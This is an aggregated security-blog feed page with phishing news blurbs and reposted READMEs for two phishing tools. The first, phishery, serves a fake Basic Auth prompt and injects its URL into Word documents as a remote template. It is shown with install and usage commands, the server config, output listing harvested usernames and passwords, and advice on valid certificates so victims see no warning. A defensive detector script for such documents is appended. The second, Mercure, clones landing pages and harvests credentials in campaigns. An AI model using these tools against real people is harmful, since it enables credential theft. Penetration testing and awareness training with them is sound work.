Evasion Techniques in Phishing Attacks

We all know that we shouldn’t click on links from sketchy looking emails. But what if the website you’re viewing takes you to a spoofed page at the Apple ID store and asks for your login information to proceed? This tactic is called phishing, and attacks are exponentially on the rise.
Used by hackers to encourage unsuspecting victims to hand over their data, these deceptive email campaigns, SMS alerts, and fake websites are often designed to look and sound authentic.
Continue reading Evasion Techniques in Phishing Attacks at Sucuri Blog.

Link: http://feedproxy.google.com/~r/sucuri/blog/~3/Kjg3VRuvFIs/evasion-techniques-phishing-attacks.html

Phishery – An SSL Enabled Basic Auth Credential Harvester with a Word Document Template URL Injector

Phishery is a simple SSL-enabled HTTP server whose primary purpose is phishing credentials via Basic Authentication. Phishery also provides the ability to easily inject the URL into a .docx Word document.

The power of phishery is best demonstrated by setting a Word document's template to a phishery URL. This causes Microsoft Word to make a request to the URL, resulting in an authentication dialog being shown to the end user. Any .docx file can be injected with a URL using phishery's -i [in docx], -o [out docx], and -u [url] options.

Download

Operating system specific packages can be downloaded from here.

Install

Extract the archive and, optionally, install the binary to $PATH:

$ tar -xzvf phishery*.tar.gz
$ cd phishery*
$ cp phishery /usr/local/bin

Usage

$ phishery --help

Basic Auth Credential Harvester with Word Doc Template Injector

Start the server : phishery -s settings.json -c credentials.json
Inject a template : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx

Options:
-h, --help  Show usage and exit.
-v          Show version and exit.
-s          The JSON settings file used to set up the server. [default: "settings.json"]
-c          The JSON file to store harvested credentials. [default: "credentials.json"]
-u          The phishery URL to use as the Word document template.
-i          The Word .docx file to inject with a template URL.
-o          The new Word .docx file with the injected template URL.

Running the server

Modify the provided settings.json file as needed. By default it looks like this:

{
  "ip": "0.0.0.0",
  "port": "443",
  "sslCert": "server.crt",
  "sslKey": "server.key",
  "basicRealm": "Secure Document Gateway",
  "responseStatus": 200,
  "responseFile": "template.dotx",
  "responseHeaders": [
    ["Content-Type", "application/vnd.openxmlformats-officedocument.wordprocessingml.template"]
  ]
}

This setup starts the HTTP server on port 443 with SSL configured to use server.crt and server.key. The basic authentication realm is set to Secure Document Gateway. When any credentials are provided, a 200 response status is sent along with the contents of the included template.dotx and the content type header: Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.template.

The settings file may also be configured to return a simple body instead, by using responseBody, like this:

{
  "ip": "0.0.0.0",
  "port": "443",
  "sslCert": "server.crt",
  "sslKey": "server.key",
  "basicRealm": "Secure Document Gateway",
  "responseStatus": 404,
  "responseBody": "<h1>Not Found</h1>",
  "responseHeaders": [
    ["Content-Type", "text/html"]
  ]
}

The effectiveness of this tool is based mostly on the domain and Basic Auth realm used, as that is often all the end user will see when the dialog is triggered from an Office document. Make sure to point your DNS A records to the public IP of the phishery server.

It is recommended that the provided cert is replaced with a trusted one, such as one generated with LetsEncrypt. Microsoft Word on OS X will prevent the auth dialog if the cert is invalid, and Microsoft Word on Windows will prompt the user to accept the invalid certificate.

Once the server is configured and running, all you need to do is embed a phishery URL in a document, or anywhere else your heart desires. Phishery does give you the ability to inject your URL into a Word document as a template; instructions on how to do this can be found below.

Injecting a Word Document

To inject a Word document with a template URL, you'll need a .docx file and the phishery server URL. Run phishery with your document and URL:

$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
[+] Opening Word document: good.docx
[+] Setting Word document template to: https://secure.site.local/docs
[+] Saving injected Word document to: bad.docx
[*] Injected Word document has been saved!

Make sure your phishery server is running and available at the URL you used. Now when the Word document is opened, the victim will be prompted with an authentication dialog, and on the server you will see the following:

$ ./phishery
[+] Credential store initialized at: credentials.json
[+] Starting HTTPS Auth Server on: 0.0.0.0:443
[*] Request Received at 2016-09-25 01:06:28: HEAD https://secure.site.local/docs
[*] Sending Basic Auth response to: 127.0.0.1
[*] New credentials harvested!
[HTTP] Host : secure.example.local
[HTTP] Request : /docs
[HTTP] User Agent : Microsoft Office Word
[HTTP] IP Address : 127.0.0.1
[AUTH] Username : john.doe
[AUTH] Password : Summer15

Download Phishery
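The injected document described above differs from a clean one in a single place: the package's relationship file for settings.xml gains an attachedTemplate relationship whose Target is an external URL. As an added example that is not part of the phishery project, the following Python check scans a .docx for that artifact, which is what a mail gateway or incident responder would look for; the build_fixture helper and the sample package it produces are constructed here for testing only.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Relationship type Word uses to point a document at its attached template.
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
# Namespace of every *.rels part inside an OOXML package.
PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def find_external_templates(docx_bytes: bytes) -> list:
    """Return (rels_part, target) for each attachedTemplate relationship whose
    TargetMode is External, i.e. a template Word will fetch from elsewhere."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                # Internal targets are plain package parts; only external ones
                # make Word issue a network (or UNC) request on open.
                if rel.get("TargetMode", "Internal") == "External":
                    hits.append((name, rel.get("Target", "")))
    return hits


def build_fixture(template_target: str = None) -> bytes:
    """Constructed minimal package (hypothetical, not a real document): only the
    settings part and its .rels, optionally carrying an external template."""
    rels = f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{PKG_REL_NS}">'
    if template_target:
        rels += (f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                 f'Target="{template_target}" TargetMode="External"/>')
    rels += "</Relationships>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("word/settings.xml", "<settings/>")
        pkg.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    print(find_external_templates(build_fixture("https://secure.site.local/docs")))
```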

Link: http://feedproxy.google.com/~r/PentestTools/~3/8yZkOBfr-eM/phishery-ssl-enabled-basic-auth.html

Tech Support Scammers Cast a Wider Net

Microsoft is warning of a wave of phishing campaigns pushing tech support scams via malicious links to phony Amazon, Alibaba and LinkedIn web pages.

Link: https://threatpost.com/tech-support-scammers-cast-a-wider-net/127254/

Mercure – A Tool For Security Managers Who Want To Train Their Colleague To Phishing

Mercure is a tool for security managers who want to teach their colleagues about phishing.

What Mercure can do:
- Create email templates
- Create target lists
- Create landing pages
- Handle attachments
- Let you keep track in the Campaign dashboard
- Track email reads, landing page visits and attachment execution
- Harvest credentials

What Mercure will do:
- Display more graphs (we like graphs!)
- Provide a REST API
- Allow for multi-message campaigns (aka scenarios)
- Check browser plugins
- User training

Docker Quickstart

Requirements: docker

Available configuration (environment variable, status, description, value example):
- SECRET_KEY, Required: Django secret key. Example: random string
- URL, Required: Mercure URL. Example: https://mercure.example.com
- EMAIL_HOST, Required: SMTP server. Example: mail.example.com
- EMAIL_PORT, Optional: SMTP port. Example: 587
- EMAIL_HOST_USER, Optional: SMTP user. Example: [email protected]
- EMAIL_HOST_PASSWORD, Optional: SMTP password. Example: [email protected]
- DEBUG, Optional: Run in debug mode. Example: True
- SENTRY_DSN, Optional: Send debug info to sentry.io. Example: https://23xxx:[email protected]/1234
- AXES_LOCK_OUT_AT_FAILURE, Optional: Ban on brute-force login. Example: True
- AXES_COOLOFF_TIME, Optional: Ban duration on brute-force login (in hours). Example: 0.8333
- DONT_SERVES_STATIC_FILE, Optional: Don't serve static files with Django. Example: True

Sample deployment:

# create container
docker run \
  -d \
  --name=mercure \
  -e SECRET_KEY=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 200 | head -n 1) \
  -e URL=https://mercure.example.com \
  -e EMAIL_HOST=mail.example.com \
  -e EMAIL_PORT=587 \
  -e [email protected] \
  -e [email protected] \
  synhackfr/mercure
# create super user
docker exec -it mercure python manage.py createsuperuser

Git Quickstart

Requirements: python3, pip

Deployment:

git clone [email protected]:synhack/mercure.git && cd mercure
pip install -r requirements.txt
./manage.py makemigrations
./manage.py migrate
./manage.py collectstatic
./manage.py createsuperuser
./manage.py runserver

How to use mercure

Mercure can be thought of as divided into four categories: Targets, Email Templates, Attachments and landing page, and Campaigns. Targets, Email Templates and Campaign are the minimum required to run a basic phishing campaign.

First, add your targets. You need to fill in the mercure name and the target email. Target first and last name are optional, but can be useful on the landing page.

Then, fill in the email template. You need to fill in the mercure name, the subject, the sender and the email content. To improve the email quality, you have to fill in both the HTML content and the text content. To get information about opened emails, check "Add open email tracker". The "Variables" category can help you here. Attachments and landing page are optional; we will see them after.

Finally, launch the campaign. You need to fill in the mercure name and select the email template and the target group. You can select the SMTP credentials, whether to use SSL, and URL minimizing.

Optional, add a landing page. You need to fill in the mercure name and the domain to use. You can use "Import from URL" to copy an existing website. You have to fill in the page content with text and HTML content by clicking "Source".

Optional, add an attachment. You need to fill in the mercure name, the file name which appears in the email, and the file. You also have to check whether the file is buildable or not, if you need to compute a file for example. To execute the build, you need to create a zip archive which contains a build script (named 'generator.sh') and a buildable file.

Download Mercure

Link: http://feedproxy.google.com/~r/PentestTools/~3/IjeYz-dxL7g/mercure-tool-for-security-managers-who.html